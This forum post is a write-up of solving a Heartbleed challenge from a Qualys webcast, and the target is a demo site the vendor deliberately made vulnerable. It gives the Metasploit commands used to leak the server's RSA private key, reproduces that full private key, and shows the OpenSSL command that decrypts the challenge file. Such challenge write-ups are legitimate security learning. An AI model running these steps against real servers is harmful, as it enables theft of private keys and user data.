jcheuvront

“A Post-Mortem on Heartbleed" webcast - challenge solved

Discussion created by jcheuvront on Apr 30, 2014

I hope this is the right place to post this.

 

Last week Qualys presented on a webcast:

“A Post-Mortem on Heartbleed - What Worked and What Didn't: Real-world case study on how the State of Colorado responded to this critical vulnerability.”

https://www.qualys.com/forms/webcasts/heartbleed/?leadsource=17265983


For this presentation they stood up a website that is vulnerable to the Heartbleed bug and put out a challenge to get the private keys, the encrypted file, and decrypt the file for a prize.

 

Here are the steps I used to get that prize.

 

Go to the website and register to login and get the "secret file"

  --note: don't use a real username or password because it can be visible while exploiting the bug.

 

Register @ https://hbdemo.kandek.com/

 

1.png

2.png

After registering to the site and logging in I was able to download the “Secret” encrypted file and save it locally for use later.

 

3.png

 

Download https://hbdemo.kandek.com/supersecret.txt.enc

 

 

Next we move on to exploiting the vulnerability in the site.

using metasploit-framework on ubuntu 12.04

 

 

> sudo ./msfconsole

> use auxiliary/scanner/ssl/openssl_heartbleed

 

4.png

> set RHOSTS hbdemo.kandek.com

> set RPORT 443

> set VERBOSITY true

> set ACTION KEYS

> run

5.png

In only a few seconds I had my answer.

 

6.png

 

-----BEGIN RSA PRIVATE KEY-----

MIIEpAIBAAKCAQEAsJVkN8MW8jpjLwz8YwWMk+Xhvk6Dz/0neLkAXZFAmtgnZsKy

NOHotstIlp5+ehf1Skf+WdrKLvATe8RpG7IOtvkO/gQnOnGT6nefNMRQG8Riw0MS

OpFUdNwLrXQnptStDtBTUFq+cY8w1ChRw4PBDjLq/3sKdSxARYDiZNUJ0RlXKfJk

DlXi1JEOICvsoYuY7Z5CjHjy2rMck+Xu0d5L0KWGcqGNsdjdtE/NhhOzsvXq/n8T

aPySSfHL5Xh9B9LsAb2evOV8t9bs2l7ASU76/sLTho8VFb9pohluHwGmWQuGaIpx

E/ZjheV4XW2cGiJmf79ccwcjdz8plzWGd66gkQIDAQABAoIBAE5enxHYdbCflTFm

lATmi5OALQYnFn0Sn5gGk1DzjDasxB/pPOoXcQ7ffaHLSdqqE2UaOppqbd0TE7KU

Ywm1pq4yLyMxeK+JhNpEqNXkYqFQMXzzoX14zoDmwBAFQyvZq8ytTKyW+Xqw0Dz4

gAFD0kSY+I7Wbre+IfA22UNjAW5ZEcyU1JGDmPBVVfGMaa00Fhx0ixvANKKL9V3d

biGomBS5Qm59s5f+dx7KmarzZ8JmaDttEYpcIllRR1cM+jtzsRvo8hB3nDAA6EFg

v94ltqJ/1IcHxrLyax6+PMKJz+CCVm4Nhs2u+FsoSORuv82tcEoBYg3ZB6uLAeWp

ad3p5DkCgYEA36viOCA3pvKl+FY2YaA2CkH9Tp+/fKTgbxX/FthpfS7VYvbzZWt1

+FhBxUDvCbBm18mDqYJ+tMk54Ku6ykFSAnX0LYWx0tDo9/m8P9oOYRjXP0tjqOhm

UqtqP8YrrqiSjpNp1EbuCkFUgU0On+s4vdrF8v2OmehDzCglF/d9uw8CgYEAyhsz

CHCE+nzx+6iHKV1q3OkuOHNSo7CQMSngMJQFhgIbapVuqaRQs8dP6orpdYUH1+vv

l/RrISNkCO+8Plz5c9am3sgcwabhWb1wBeR05IhovqWPLlTf24IWf0vW/B9aDIw7

3zlPe2GbBBV2IYPxFmdiZUIvERiqlwHchk5Oal8CgYEA0MxJCrHwodWkX/ZDH9GK

gPrnN41jGT1lEe5LygzONQESTCdSQZwWbXYeN8CNJNNavhgs44GhPK0YbYaCgaqG

nytzfUdwH+fLgynLtSOfBr9EuJ5s81G3q3a/YbdiMdLFtXkhcvuf3UztUSMZAup3

dqwS2+odQ8mR+LSFJCFyarsCgYEAkaQWG3/SJBwD2SEx/XoHNxiGKUHZjIIA9pzB

pOAWNuKv1RfIPlFdop//k/n0kK6D33JzHuKQjLnPLa1sztf7HyHQ8HvuVRKoFB4y

atyd683tBW2TB4U8KBfPlH4Xd2o0XxRzVMIc58GHjuLUVQSaqFVqD6Qo/L30uIsr

2lD1qysCgYAUqmsr5eMl0VgM7ACvKPwQNMzZzA+1mj6ijWMGDMzKKPwHtK+avIw4

fvTj88CJ43gvv6tN+zXtJrUHPEN6rgR/FSyrnVjXbb8+PuYfl15zpBrW5weNrcMV

AlCn+Q7FcVTbZkHfZ1SoA7HG3hZfnRRMPBwjEMOQb9NPRlM2WqKZNw==

-----END RSA PRIVATE KEY-----

 

save file as hbdemo.key

 

Now decrypt the secret file using the private key.

 

> cat supersecret.txt.enc | openssl rsautl -decrypt -inkey hbdemo.key

 

7.png

results:

> Darth Vader is Luke's father.

 

8.jpg

 

The next part was funny, I didn't remember where they said to send the answer to so I reached out to people I know to ask if they knew Wolfgang and I was able to get his phone number. On his voice mail I was able to get his email address and that is where I sent the answer to. I also posted out to twitter and he responded to me with his email (but I had already send the answer by that time).

 

I just want to say thank you to Wolfgang and the Qualys team for doing the webcast and adding a challenge to it also. It made it interactive and fun.  I hope they do this more in future webcasts.

Outcomes